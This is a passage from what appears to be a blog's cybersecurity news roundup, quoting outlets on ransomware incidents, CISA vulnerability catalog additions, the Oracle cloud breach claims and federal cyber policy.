  • “The Oregon Department of Environmental Quality (DEQ) is the regulatory agency in charge of the quality of air, land and water in the state. The organization revealed on April 9 that it had launched an investigation into a cyberattack that forced it to shut down networks as part of containment efforts.
  • “The DEQ has been issuing updates every day since, and several of the updates pointed out that the agency had found no evidence of a data breach. 
  • “The incident disrupted email and help desk services, as well as vehicle inspection stations. The agency said its environmental data management system is hosted on a separate server and has not been impacted.
  • “After the regulator’s repeated denials about suffering a data breach, the notorious Rhysida ransomware group took credit for the attack on Monday, claiming to have stolen 2.5 Tb of files, including employee data.” 

• Bleeping Computer points out,
  • “The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices.
  • “ClickFix is a social engineering tactic where victims are tricked into executing dangerous PowerShell commands on their systems to supposedly fix an error or verify themselves, resulting in the installation of malware.
  • “Though this isn’t the first time ClickFix has been linked to ransomware infections, confirmation about Interlock shows an increasing trend in these types of threat actors utilizing the tactic.
  • “Interlock is a ransomware operation launched in late September 2024, targeting FreeBSD servers and Windows systems.
  • “Interlock is not believed to operate as a ransomware-as-a-service model. Still, it maintains a data leak portal on the dark web to increase pressure on victims, demanding payments ranging from hundreds of thousands of dollars to millions.”

• The Register adds,
  • “Ransomware operators jack up their ransom demands by a factor of 2.8x if they detect a victim has cyber-insurance, a study highlighted by the Netherlands government has confirmed.
  • “For his PhD thesis [PDF], defended in January, Dutch cop Tom Meurs looked at 453 ransomware attacks between 2019 and 2021. He found one of the first actions intruders take is to search for documents with the keywords “insurance” and “policy.” If the crooks find evidence that the target has a relevant policy, the ransom more than doubles on average.
  • “In double-extortion attacks, where intruders threaten to publish data stolen from the victim unless the ransom is paid, those with insurance on average are quoted 5.5x more than those who don’t.” * * *
  • “According to the research, firms with a proper backup system were 27x less likely to pay criminals off, for the simple reason that they usually don’t need to. Even then, surprisingly, some do.
  • “In roughly 5 out of 100 cases in which a payment is made, victims do have the option to recover in a way other than paying, but they still choose to pay – for example to recover faster or to prevent reputational damage,” he said.
  • “In the remaining 95 cases, there is no other option to recover. In those cases, their entire IT infrastructure is broken and can no longer be repaired, making paying the ransom the only option to avoid bankruptcy.”

From the cybersecurity defenses front,

• The American Hospital Association News tells us,
  • “The Cybersecurity and Infrastructure Security Agency April 17 released guidance to reduce risks associated with a reported breach of Oracle cloud services. CISA said the scope and impact of the breach is unconfirmed and that credentials may be exposed that could be reused across unaffiliated systems or embedded. The guidance lists recommendations for organizations and individual users to mitigate the risk of potential compromise. 
  • “This alert not only contains practical guidance to mitigate the potential breach related to Oracle but also provides valuable guidance and best practices for general cloud security,” said John Riggi, AHA national advisor for cybersecurity and risk. “Generally speaking, we continue to see that most of the cyber risk exposure that hospitals and health systems face originates from insecure third-party technologies, service providers and the supply chain. It is vitally important for mission-critical third parties to share timely threat intelligence and adversary tactics with the federal government and affected clients. This is necessary to prevent potential cyberattacks, which could compromise sensitive data and risk patient safety.” 

• Dark Reading asks “Are We Prioritizing the Wrong Security Metrics? True security isn’t about meeting deadlines — it’s about mitigating risk in a way that aligns with business objectives while protecting against real-world threats.”

• Cyberscoop considers whether “Ivanti is the problem or a symptom of a systemic issue with network devices? Exploited vulnerabilities have turned up in Ivanti products 16 times since 2024. That’s more than any other vendor in the network edge device space.”

• Bleeping Computer suggests “7 Steps to Take After a Credential-Based cyberattack.”
  • “When credentials fall into the wrong hands and hackers breach your systems, every minute counts — but having a well-rehearsed incident response plan will allow you to minimize damage and recovery time.”

• Here is a link to Dark Reading’s CISO corner.

From the cybersecurity policy and law enforcement front,

• Federal News Network tells us,
  • “The second Trump administration’s cybersecurity policy is still coming into view, but GOP lawmakers are calling for the White House to kick off a review of existing and future cyber regulations.
  • “Lawmakers and policy experts are particularly focused on three key rules: the Cybersecurity and Infrastructure Security Agency’s incident reporting requirements; the Department of Health and Human Services’ proposed update to health care security requirements; and the Securities and Exchange Commission’s 2023 cybersecurity risk management requirements.”

• FEHBlog note — As early as April 21, federal agencies will be announcing the withdrawal of certain proposed rules, such as the HIPAA Security Rule amendments, which stripped the rule of its most important feature — flexibility, and the repeal of certain final rules under a February 19, 2025, executive order which a Presidential memorandum supplemented last Wednesday.

• The American Hospital Association News explained on April 10,
  • The Trump administration yesterday released executive orders on reducing anti-competitive regulatory barriers and repealing certain regulations deemed unlawful.  
  • The order on reducing anti-competitive barriers directs federal agencies to review all regulations subject to their rulemaking authority and identify those that create de facto or de jure monopolies, create barriers to entry for new market participants, create or facilitate licensure or accreditation requirements that unduly limit competition, or otherwise impose anti-competitive restraints or distortions in the market.   
  • The order on repealing unlawful regulations is linked to a Feb. [19] executive order [published in the Federal Register on Feb. 25] that directed agencies within 60 days to identify unlawful and potentially unlawful regulations to be repealed. The new order instructs agencies to take steps to immediately repeal regulations and provide justification within 30 days for any identified as unlawful but have not been targeted for repeal, explaining the basis for the decision not to repeal.

• The Mintz law firm points out that on April 7, 2025, OMB issued new guidance for the Federal Government’s use of artificial intelligence (AI), and President Trump signed an EO for AI Data Centers.

• Security Week reports,
  • The National Institute of Standards and Technology (NIST) has announced that all CVEs published before January 1, 2018, will be marked as ‘Deferred’ in the National Vulnerability Database (NVD).
  • This means that, because the CVEs are old, NIST will no longer prioritize updating NVD enrichment or initial NVD enrichment data for them, unless they are or have been included in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
  • “CVEs marked as Deferred will display a banner on their CVE Detail Pages indicating this status. This change will take place over the span of several nights. We are doing this to provide additional clarity regarding which CVE records are prioritized,” NIST announced.
  • “We will continue to accept and review requests to update the metadata provided for these CVE records. Should any new information clearly indicate that an update to the enrichment data for the CVE is appropriate, we will continue to prioritize those requests as time and resources allow,” NIST said.

• Per an April 10, 2025, HHS press release,
  • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Northeast Radiology, P.C. (NERAD), a professional corporation that provides clinical services at medical imaging centers in New York and Connecticut, concerning potential violations of the Health Insurance Portability and Accountability Act (HIPAA) Security Rule.” * * *
  • “OCR initiated its investigation of NERAD after receiving a breach report from NERAD in March 2020 about a breach of unsecured ePHI. NERAD reported that between April 2019 and January 2020, unauthorized individuals had accessed radiology images stored on NERAD’s PACS server. NERAD notified the 298,532 patients whose information was potentially accessible on the PACS server of this breach. OCR’s investigation found that NERAD had failed to conduct an accurate and thorough risk analysis to determine the potential risks and vulnerabilities to the ePHI in NERAD’s information systems.
  • “Under the terms of the resolution agreement, NERAD agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $350,000 to OCR.” * * *
  • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-settlement-nerad.pdf, opens in a new tab [PDF, 369 KB]“

From the cybersecurity breaches and vulnerabilities front,

• The Wall Street Journal reports,
  • “Chinese officials acknowledged in a secret December [2024] meeting that Beijing was behind a widespread series of alarming cyberattacks on U.S. infrastructure, according to people familiar with the matter, underscoring how hostilities between the two superpowers are continuing to escalate.
  • “The Chinese delegation linked years of intrusions into computer networks at U.S. ports, water utilities, airports and other targets, to increasing U.S. policy support for Taiwan, the people, who declined to be named, said.  
  • “The first-of-its-kind signal at a Geneva summit with the outgoing Biden administration startled American officials used to hearing their Chinese counterparts blame the campaign, which security researchers have dubbed Volt Typhoon, on a criminal outfit, or accuse the U.S. of having an overactive imagination.” * * *
  • “A Chinese official would likely only acknowledge the intrusions even in a private setting if instructed to do so by the top levels of Xi’s government, said Dakota Cary, a China expert at the cybersecurity firm SentinelOne. The tacit admission is significant, he said, because it may reflect a view in Beijing that the likeliest military conflict with the U.S. would be over Taiwan and that a more direct signal about the stakes of involvement needed to be sent to the Trump administration.
  • “China wants U.S. officials to know that, yes, they do have this capability, and they are willing to use it,” Cary said.”

• Per Bleeping Computer,
  • “Laboratory Services Cooperative (LSC) has released a statement informing it suffered a data breach where hackers stole sensitive information of roughly 1.6 million people from its systems.
  • “LSC is a Seattle-based nonprofit organization that provides centralized laboratory services to its member affiliates, including select Planned Parenthood centers.
  • “It plays a crucial role within its niche, supporting organizations in the reproductive health services across more than 35 U.S. states, handling sensitive lab testing, billing, and personal data.”
• and
  • “Oracle finally confirmed in email notifications sent to customers that a hacker stole and leaked credentials that were stolen from what it described as “two obsolete servers.”
  • “However, the company added that its Oracle Cloud servers were not compromised, and this incident did not impact customer data and cloud services.
  • “Oracle would like to state unequivocally that the Oracle Cloud—also known as Oracle Cloud Infrastructure or OCI—has NOT experienced a security breach,” Oracle says in a customer notification shared with Bleeping Computer.”
• and
  • “Phishing-as-a-service (PhaaS) platform Tycoon2FA, known for bypassing multi-factor authentication on Microsoft 365 and Gmail accounts, has received updates that improve its stealth and evasion capabilities.
  • “Tycoon2FA was discovered in October 2023 by Sekoia researchers, who later reported significant updates on the phishing kit that increased its sophistication and effectiveness.
  • “Trustwave now reports that the Tycoon 2FA threat actors have added several improvements that bolster the kit’s ability to bypass detection and endpoint security protections.”
    
• The Cybersecurity and Infrastructure Security Agency added five known exploited vulnerablities to its catalog this week.
  • April 7, 2025
    • CVE-2025-31161 CrushFTP Authentication Bypass Vulnerability
    • Huntress discusses this KVE here.
  • April 8, 2025
    • CVE-2025-30406 Gladinet CentreStack Use of Hard-coded Cryptographic Key Vulnerability
    • CVE-2025-29824 Microsoft Windows Common Log File System (CLFS) Driver Use-After-Free Vulnerability
    • The Hacker News discusses the Gladinet KVW here while Help Net Security discusses the MS KVE here.
  • April 9, 2025
    • CVE-2024-53197 Linux Kernel Out-of-Bounds Access Vulnerability
    • CVE-2024-53150 Linux Kernel Out-of-Bounds Read Vulnerability
    • Linux Security discusses these KVEs here.

• CISA announced yesterday,
  • Fortinet is aware of a threat actor creating a malicious file from previously exploited Fortinet vulnerabilities (CVE-2024-21762, CVE-2023-27997, and CVE-2022-42475) within FortiGate products. This malicious file could enable read-only access to files on the device’s file system, which may include configurations. Fortinet has communicated directly with the account holders of customers identified as impacted by this issue based on the available telemetry with mitigation guidance.
  • See the following resource for more information: Analysis of Threat Actor Activity | Fortinet Blog

From the ransomware front,

• Morphisec discusses the most notable ransomware attacks from the last six months.

• Cybersecurity Dive informs us,
  • “Remote access tools were the initial entry point in eight of every 10 ransomware attacks in 2024, according to a report released Thursday by At-Bay. VPNs accounted for about two-thirds of ransomware attack entry points. 
  • “Indirect ransomware claims continue to rise, showing a 43% increase in 2024, according to At-Bay. Indirect ransomware is when an attack begins on a third-party vendor or business partner, often leading to a data breach or business interruption of a downstream client or partner. The report cites the 2023 MOVEit breaches and the 2024 CDK attacks. 
  • “Overall, the frequency of ransomware claims returned to record levels seen in 2021 after a decreased rate of attacks in 2022 and 2023, according to At-Bay.” 
• and
  • “Sensata Technologies was struck by a ransomware attack earlier this week that disrupted several of the company’s operations, according to a regulatory filing.
  • “Sensata disclosed that a ransomware attack on Sunday encrypted certain devices on the network. The Attleboro, Mass.-based company specializes in sensors, controls and other industrial technology for the automotive, aerospace and manufacturing sectors.
  • “The incident has temporarily impacted Sensata’s operations, including shipping, receiving, manufacturing production, and various other support functions. While the company has implemented interim measures to allow for the restoration of certain functions, the timeline for a full restoration is not yet known,” Sensata said in the SEC filing.”

• Dark Reading lets us know,
  • “While ransomware represented the costliest cyber-insurance claims in 2024, incidents of financial fraud continue to be far more numerous, with both often triggered by security failures at a third-party firm.
  • “That insight comes from the latest tranche of cyber-insurance data released this year, this time by cyber-insurance firm At-Bay. Financial fraud — most often following a phishing attack — remained the most common type of cyberattack leading to an insurance claim, according to At-Bay’s “2025 InsurSec Report,” released this week. While the cyber insurer saw 16% more claims in 2024 than the year before, the overall cost of each incident declined to $166,000, down from $213,000 in 2021.”

• Microsoft Security explains how cyber attackers exploit domain controllers using ransomware.

• CSO in a commentary article notes,
  • “If you didn’t pay much attention to news of the recent Codefinger ransomware attack, it’s probably because ransomware has become so prevalent that major incidents no longer feel notable.
  • “But Codefinger is not just another ransomware breach to add to the list of incidents where businesses lost sensitive data to attackers. In key respects, Codefinger represents a substantially new type of ransomware attack.
  • “By extension, the incident is a reminder of why conventional cybersecurity techniques won’t always protect businesses and their data — and why organizations need to think beyond the basics regarding defending against ransomware.”

• Tech Target discusses best practices on reporting ransomware attacks.

From the cybersecurity defenses front,

• Security Week notes,
  • “As the threat landscape grows more sophisticated, Chief Information Security Officers (CISOs) are continuously searching for innovative ways to safeguard their organizations. Yet one of the most potent tools in their arsenal remains underutilized – DNS (domain name systems).”

• An ISACA blog entry discusses how to build AI governance by design.

• Per Bleeping Computer,
  • “Microsoft is testing a new Defender for Endpoint capability that will block traffic to and from undiscovered endpoints to thwart attackers’ lateral network movement attempts.
  • “As the company revealed earlier this week, this is achieved by containing the IP addresses of devices that have yet to be discovered or onboarded to Defender for Endpoint.
  • “Redmond says the new feature will prevent threat actors from spreading to other non-compromised devices by blocking incoming and outgoing communication with devices using contained IP addresses.”

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy front,

• Nextgov/FCW reports,
  • “Rep. Eric Swalwell, the House Homeland Security Committee’s leading Democratic voice on cybersecurity matters, suggested Wednesday that government contractors could be deployed to conduct offensive cybersecurity operations against foreign adversaries.
  • “Speaking at an Axonius event in Washington, D.C., the California congressman said the concept is worth exploring, in part, because “the federal government does not have the resources to protect every company that gets hit,” and that the moves could deter adversaries like Russia from targeting low-resourced critical infrastructure sectors.
  • “The remarks make Swalwell one of the first Democrats to publicly suggest that the private sector take a broader role in hacking back against foreign rivals. The dynamic has been floated in recent months largely by Republicans as a way to respond to headline-making Chinese intelligence intrusions into U.S. telecom systems and other infrastructure.”

• Per a news release,
  • “Incident response is a critical part of cybersecurity risk management and should be integrated across organizational operations. The six Functions of the NIST Cybersecurity Framework (CSF) 2.0 all play vital roles in incident response.
  • “NIST has finalized Special Publication (SP) 800-61r3 (Revision 3), Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile, which describes how to incorporate incident response recommendations into cybersecurity risk management activities in alignment with CSF 2.0. This guidance will help organizations reduce the number and impact of incidents that occur and improve the efficiency and effectiveness of their incident detection, response, and recovery activities.
  • “SP 800-61r3 supersedes SP 800-61r2 (Revision 2), Computer Security Incident Handling Guide.
  • “Readers of SP 800-61r3 are encouraged to utilize the resources on NIST’s Incident Response project page in conjunction with this document to implement these recommendations and considerations.” 

• The American Hospital Association News tells us,
  • “The House Energy and Commerce Oversight and Investigations Subcommittee April 1 discussed cybersecurity threats in legacy medical devices during a hearing. The subcommittee heard from experts on the dangers of outdated devices as the hardware can last several years longer than software.”

From the cyber vulnerabilities and breaches front,

• The Cybersecurity and Infrastructure Security Agency added three known exploited vulnerabilities to its catalog this week.
  • March 31, 2025
    • CVE-2024-20439 Cisco Smart Licensing Utility Static Credential Vulnerability
    • Cybersecurity Dive discusses this KVE here.
  • April 1, 2025
    • CVE-2025-24813 Apache Tomcat Path Equivalence Vulnerability
    • Fortiguard discusses this KVE here.
  • April 4, 2025
    • CVE-2025-22457 Ivanti Connect Secure, Policy Secure and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
    • Security Week discusses this KVE here.
      
• Cybersecurity Dive reports on April 2,
  • A recent surge in login attempts targeting Palo Alto Networks’ PAN-OS GlobalProtect portals mainly located in the U.S. could be a precursor to a large-scale exploitation of unpatched or zero-day vulnerabilities, researchers have found. 
  • The threat activity means defenders with exposed Palo Alto Networks VPN systems should review March 2025 logs and consider engaging in detailed threat hunting to detect signs of compromise.
  • Over the last 30 days, nearly 24,000 unique IP addresses have attempted to access these portals, activity that suggests a coordinated effort to identify exposed or vulnerable systems for targeted abuse of flaws, according to a report released this week from security intelligence firm GreyNoise.

• HelpNet Security points out “Attackers are targeting CrushFTP vulnerability with public PoC (CVE-2025-2825).”
  • “Exploitation attempts targeting the CVE-2025-2825 vulnerability on internet-facing CrushFTP instances are happening, the Shadowserver Foundation has shared on Monday, and the attackers have been leveraging publicly available PoC exploit code.”

From the ransomware front,

• The Wall Street Journal reports,
  • “The Federal Trade Commission in March identified impostor scams—in which someone impersonates a loved one, colleague or government official—as the most-reported type last year, resulting in losses of nearly $3 billion. 
  • “Criminals increasingly use generative AI to mimic a loved one’s voice, making these kinds of scams more believable, the Federal Bureau of Investigation has warned. It takes just three seconds of audio to clone a voice with 85% accuracy, according to the security-software firm McAfee, whose survey of 7,000 people globally found that more than half regularly share voice content online.
  • “Criminals can also use AI to approximate the voice of someone of any age, gender or dialect. During a high-stress situation, a generic voice of a young woman could be confused for the voice of a daughter, according to cybersecurity experts.”

• Per Cybersecurity Dive,
  • “The FBI, the Cybersecurity and Infrastructure Security Agency and a group of international partners on Thursday [April 3] warned that cyber threat groups are using a technique called “fast flux” to hide the locations of malicious servers, posing a significant threat to national security.
  • “Authorities warned that both criminal and state-linked threat groups have used fast flux to obfuscate the locations of these servers using fast-changing Domain Name System records. They also can create highly resilient command and control (C2) infrastructure to conceal their malicious operations, particularly in connection with botnets.
  • “Fast flux techniques are not only used for C2 communications but also in phishing campaigns to protect social engineering websites from being blocked or taken down, authorities said.” 
  • “Authorities did not specify whether there is an active campaign using fast flux or directly name any threat actor currently using the technique. However, they did reference past activity, noting that fast flux has been used in previous ransomware attacks linked to Hive and Nefilim. Additionally, a Russia-backed threat actor known as Gamaredon has also used fast flux to mask threat activities, according to the advisory.”
  • “Authorities did not specify whether there is an active campaign using fast flux or directly name any threat actor currently using the technique. However, they did reference past activity, noting that fast flux has been used in previous ransomware attacks linked to Hive and Nefilim. Additionally, a Russia-backed threat actor known as Gamaredon has also used fast flux to mask threat activities, according to the advisory.” 
    
• Beckers Health IT informs us on March 31,
  • “The FBI is investigating a cyberattack on Oracle’s computer systems in which hackers stole patient data to extort multiple U.S. healthcare providers, Bloomberg reported March 28.
  • “Oracle notified some healthcare customers earlier this month that the breach occurred sometime after Jan. 22. According to a notice sent to clients and obtained by Bloomberg, hackers accessed company servers and copied patient data to an external location.
  • “A person familiar with the matter, who spoke on condition of anonymity, told the publication that cybercriminals attempted to demand ransom from affected medical providers. The total number of targeted providers and stolen patient records remains unknown.
  • “Oracle did not respond to Bloomberg’s request for comment. An FBI spokesperson also declined to comment.”

• Per Bleeping Computer,
  • “​Port of Seattle, the U.S. government agency overseeing Seattle’s seaport and airport, is notifying roughly 90,000 individuals of a data breach after their personal information was stolen in an August 2024 ransomware attack.
  • “The agency disclosed the attack on August 24, saying the resulting IT outage disrupted multiple services and systems, including reservation check-in systems, passenger display boards, the Port of Seattle website, the flySEA app, and delayed flights at Seattle-Tacoma International Airport.
  • “Three weeks after the initial disclosure, the Port confirmed that the Rhysida ransomware operation was behind the August 2024 breach.
  • “After the incident, the Port also decided not to give in to the cybercriminals’ demands to pay for a decryptor even though they threatened to publish stolen data on their dark web leak site.
  • “We have refused to pay the ransom demanded, and as a result, the actor may respond by posting data they claim to have stolen on their darkweb site,” the Port of Seattle said on September 13, 2024.
  • “Our investigation of what data the actor took is ongoing, but it does appear that some Port data was obtained by the actor in mid-to-late August. Assessment of the data taken is complex and takes time.”

• Forta discusses,
  • “HellCat [which] is the name of a relatively new ransomware-as-a-service (RaaS) group that first came to prominence in the second half of 2024. Like many other ransomware operations, HellCat breaks into organisations, steals sensitive files, and encrypts computer systems – demanding a ransom payment for a decryption key and to prevent the leaking of stolen files.”

• GTSC brings us up to date on the Medusa ransomware gang.
  • The Medusa ransomware gang is a ransomware-as-a-service (RaaS) operation first identified in June 2021. Since then, it has targeted over 300 victims across various critical infrastructure sectors, including medical, education, legal, insurance, technology, and manufacturing. ​

• Per SC Media,
  • “A threat actor using a combination of AI-powered vishing, the more conventional remote access tool Microsoft Quick Assist, and living-off-the-land techniques has demonstrated how a simple vishing attack can escalate into a full compromise.
  • “In an April 1 blog post, researchers from Ontinue reported that the techniques observed in this recent campaign align with those previously attributed to Storm-1811, a threat actor identified by Microsoft known for leveraging vishing, MS Quick Assist, and social engineering via MS Teams to gain network access.
  • “SC Media first reported on this group last May, in which it was reported the group abused Quick Assist to deploy the BlackBasta ransomware.”

From the cybersecurity defenses front,

• Cyberscoop reports,
  • “Businesses don’t always get what they pay for in cybersecurity. Some of the most expensive cloud network firewall vendors are among the worst performers against exploits and evasions, according to the most comprehensive, independent testing CyberRatings.org has conducted to date.
  • “Cisco, by far the most expensive cloud network firewall offering across the top 10 vendors on price per megabits per second, ranked seventh with an overall security effectiveness score of 53.5%, according to CyberRatings.org research released Wednesday. 
  • “The trio of big cloud providers — Amazon Web Services, Microsoft Azure and Google Cloud Platform — fared even worse, each landing at the bottom of the pack with a 0% security effectiveness score. 
  • “We’ve been told to use cloud-native technologies, that they’re better suited than using bolt-ons. Well, that’s clearly not the case here,” CyberRatings.org CEO Vikram Phatak told CyberScoop.”

• Dark Reading explains “How an Interdiction Mindset Can Help Win War on Cyberattacks. The US military and law enforcement learned to outthink insurgents. It’s time for cybersecurity to learn to outsmart and outmaneuver threat actors with the same framework.”
  
• In email news
  • Bleeping Computer lets us know “Google rolls out easy end-to-end encryption for Gmail business users.”
  • Dark Reading informs us “Microsoft Boosts Email Sender Rules for Outlook. Beginning on May 5, the tech giant will enforce new email authentication protocols for Outlook users who send large volumes of email.”

• Per a NIST news release, here are “7 Tips to Keep Your Smart Home Safer and More Private, From a NIST Cybersecurity Researcher.”

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front,

• The American Hospital Association tells us,
  • The Trump Administration March 28 announced that it renewed for one year the public emergency for ongoing malicious cyber-enabled activities against the U.S. The national emergency was first issued in April 2015.”
    
• Cyberscoop tells us,
  • “Many cyber experts are panning a new Trump administration executive order that would shift more responsibilities for responding to cyberattacks to state and local governments, saying it will leave states holding the bag for a job they aren’t best equipped to handle.
  • “The executive order, issued last week, is entitled “Achieving Efficiency Through State and Local Preparedness.” Its stated purpose is to improve defenses against cyberattacks and other risks, but many expect it will do the opposite.
  • “Federal policy must rightly recognize that preparedness is most effectively owned and managed at the State, local, and even individual levels, supported by a competent, accessible, and efficient Federal Government,” it reads. “Citizens are the immediate beneficiaries of sound local decisions and investments designed to address risks, including cyber attacks, wildfires, hurricanes, and space weather.”
  • “A number of cyber experts said it was a misguided document, sometimes in harsh terms, especially as it pertains to where they believe responsibilities should be assigned.”

• Indiana University Professor Scott Shackleford, writing in the Wall Street Journal, offers ideas five federal cybersecurity reforms:
  • “The U.S. is spending more than ever on cybersecurity yet cyberattacks continue to proliferate.
  • “According to McKinsey, global losses to cyberattacks could exceed $10.5 trillion this year, a 300% increase from 2015 and an amount larger than the economies of Germany and Japan combined.
  • “I believe a new approach is needed—one in which the federal government plays a more assertive role.
  • “For at least two decades, U.S. cybersecurity policy has been stuck in a pattern of incremental tweaks focused on the same basic ideas—encouraging voluntary industry cooperation, offering information-sharing partnerships and establishing new bureaucratic offices. It isn’t working. We need bold changes, the most important of which is treating cybersecurity as a public good akin to national security and public safety.” 

• FCW/NextGov informs us,
  • “The General Services Administration launched FedRAMP 20x Monday, an effort it is pursuing with industry to use more automation and cut red tape around the government’s cloud security assessment and authorization program. 
  • “The Federal Risk and Authorization Management Program, or FedRAMP, is used to ensure services offered by cloud providers meet certain cybersecurity requirements before government agencies can use them.
  • “Our partnership with the commercial cloud industry needs serious improvement. Strengthening this relationship will help us fulfill our commitment to cutting waste and adopting the best available technologies to modernize the government’s aging IT infrastructure,” Stephen Ehikian, acting administrator of the General Services Administration, which runs FedRAMP, said in a statement. “FedRAMP 20x will give agencies access to the latest technology now — not months or years down the road.”

• Security Boulevard summarizes public comments on the proposed HIPAA Security Rule amendments and discusses next steps. The public comment deadline was March 7.

• Bleeping Computer points out,
  • “The U.S. Department of Justice (DOJ) has seized over $8.2 million worth of USDT (Tether) cryptocurrency that was stolen via ‘romance baiting’ scams.
  • “Previously referred to as ‘pig butchering,’ in this type of financial fraud victims are manipulated into making investments on fraudulent websites/apps that showcase massive returns.”

From the cybersecurity vulnerabilities and breaches front,

• Security Week lets us know,
  • “The National Institute of Standards and Technology (NIST) is still struggling to clear the growing backlog of CVEs in the official national vulnerability database and the problem will only get worse this year.
  • “That’s the gist of a fresh NIST update with an admission that the current pace of processing vulnerabilities is simply not enough to keep up with the surge in submissions.
  • “According to the update, while the National Vulnerability Database (NVD) is processing incoming CVEs at the same rate as before the slowdown in spring and early summer 2024, a 32 percent jump in submissions last year means that the backlog continues to grow.
  • “We anticipate that the rate of submissions will continue to increase in 2025,” the institute said, noting that it is exploring the use of AI and machine learning to automate certain processing tasks.”

• The Cybersecurity and Infrastructure Security Agency added five known vulnerabilities to it catalog this week.
• March 24, 2025
  • CVE-2025-30154 review dog action-setup GitHub Action Embedded Malicious Code Vulnerability
• March 26, 2025
  • CVE-2019-9874 Sitecore CMS and Experience Platform (XP) Deserialization Vulnerability
  • CVE-2019-9875 Sitecore CMS and Experience Platform (XP) Deserialization Vulnerability
    • Security Affairs discusses the March 24 and 26 KVEs here.
• March 27, 2025
  • CVE-2025-2783 Google Chromium Mojo Sandbox Escape Vulnerability
    • Bleeping Computer discusses a fix to this KVE here.

• Cybersecurity Dive reports yesterday,
  • “Information security firms are taking measures to protect customers and their own networks as they wait for official guidance following claims of a massive attack against Oracle Cloud. 
  • “A threat actor last week claimed to have stolen 6 million data records, including user credentials, from Oracle Cloud, which could affect more than 140,000 customers. After initially releasing strong denials, Oracle has been silent this week, while security researchers have compiled evidence backing claims of an actual attack.” * * *
  • “Orca Security said it was initially skeptical of the reported breach and has not seen any confirmation that the hacker obtained user credentials. However, the firm did not consider Oracle’s initial denials to be fully transparent.
  • “We still believe that the risk outweighs our skepticism and that organizations should take immediate action to rotate credentials and otherwise protect their Oracle Cloud tenants as appropriate,” Neil Carpenter, field CTO at Orca Security, said via email.” 
• and
  • “Researchers warn that three older vulnerabilities in DrayTek routers have been actively exploited in recent weeks, which coincides with widespread reports of devices automatically rebooting in recent days, according to GreyNoise Intelligence.  
  • “Researchers said exploitation activity has been observed against three vulnerabilities, tracked as CVE-2020-8515, CVE-2021-20123 and CVE-2021-20124. 
  • “GreyNoise researchers said they cannot directly link the exploitation to the reboots. However, in a post on X Wednesday morning, DrayTek said the reboots appear to be linked to vulnerabilities disclosed in early March.”
• and
  • “A prolific Russian threat actor is exploiting a zero-day flaw in the Microsoft Management Console (MMC) framework to execute malicious code on targeted systems in an ongoing cyberattack campaign that puts unpatched systems at risk.
  • “The attacks, by a group that Trend Micro tracks as Water Gamayun, uses the CVE-2025-26633 vulnerability, also known as MSC Evil Twin, to manipulate .msc files and the MCC console’s Multilingual User Interface Path (MUIPath). From there the attacker, better known as EncryptHub, downloads and executes malicious payloads, maintains persistence and steals sensitive data from infected systems.
  • Microsoft patched MSC Evil Twin as part of its March Patch Tuesday raft of fixes on March 11. The flaw was still a zero-day when EncryptHub exploited it by executing malicious .msc files through a legitimate one, according to Trend Micro. The flaw allows an attacker to bypass a security feature in the MMC after convincing a victim to click on a malicious link or open a malicious file. The weakness stems from the console’s failure to properly sanitize user input.

• Dark Reading reports,
  • “The rate of severe cloud security incidents affecting customers of Palo Alto Networks rose more than threefold over the course of 2024.
  • “By comparing the beginning and end of 2024, Palo Alto tracked a 388% increase in cloud security alerts affecting organizations. The overwhelming majority of that rise can be attributed to neither threats of a low severity (up 10% through the year) nor even medium-severity (up 21%), but high-severity incidents, which rose by a full 235%.
  • “The implication here is that malicious actors are not only attacking the cloud more often but also doing it more effectively.”
• and
  • “Bypassing multifactor authentication isn’t hard, if you’re willing to get a little evil.
  • “Sophos researchers this week detailed how Evilginx, a malicious version of the widely used open source NGINX Web server, can be used in adversary-in-the-middle (AitM) attacks to steal credentials and authentication tokens. Perhaps more importantly, the hacking tool can beat MFA protection.
  • “Evilginx has been around for many years as an AitM framework for capturing user credentials, but security researchers have recently deployed the tool for more complex attacks. For example, Accenture security research Yehuda Smirnov last year developed a technique to beat Microsoft’s Windows Hello for Business by downgrading the authentication via an Evilginx attack.
  • “Smirnov demonstrated the technique at Black Hat USA 2024, and Microsoft issued a fix to prevent the attack. However, Sophos researchers say Evilginx can still be used to sweep up credentials and bypass MFA.”

• Per Bleeping Computer,
  • “A newly discovered phishing-as-a-service (PhaaS) operation that researchers call Morphing Meerkat, has been using the DNS over HTTPS (DoH) protocol to evade detection.
  • “The platform also leverages DNS email exchange (MX) records to identify victims’ email providers and to dynamically serve spoofed login pages for more than 114 brands.
  • “Morphing Meerkat has been active since at least 2020 and it was discovered by security researchers at Infoblox. Although the activity has been partially documented, it went mostly under the radar for years.”

From the ransomware front,

• Cybersecurity Dive reports,
  • “Ransomware actors are increasingly abusing vulnerable drivers to craft tools known as “EDR killers,” which can disrupt and even delete extended detection and response products in enterprise networks, according to an ESET report published Wednesday.
  • “Threat actors abuse vulnerable drivers because they have kernel access to operating systems, which enables attackers to kill processes for security products like EDR before they can detect malicious activity.
  • “ESET researchers analyzed a custom tool called “EDRKillShifter,” which was developed and maintained by the notorious RansomHub ransomware gang and is now available on the dark web. The researchers observed an increase in the use of EDRKillShifter among other ransomware-as-a-service gangs such as Play, Medusa and BianLian.”

• Beckers Health IT warns,
  • “The FBI and other federal authorities are warning healthcare organizations to safeguard against a ransomware group targeting the industry.
  • “The Medusa ransomware-as-a-service variant has been used to hack more than 300 victims from a variety of industries, including healthcare, most commonly through phishing campaigns and unpatched software vulnerabilities, according to a March cybersecurity advisory from the FBI, Cybersecurity and Infrastructure Security Agency, and Multi-State Information Sharing and Analysis Center.
  • “Medusa threat actors employ a “double extortion” model, where they both encrypt victims’ data and threaten to publicly release stolen information if their demands aren’t met, per the notice. They typically send ransom notes within 48 hours of an attack, offering to extend the deadline to pay by $10,000 a day.
  • “Healthcare organizations can protect against the threat by taking such steps as implementing a recovery plan, requiring multifactor authentication, and ensuring all operating systems, firmware and software are up to date, the agencies said.”

• Per the Silicon Alley,
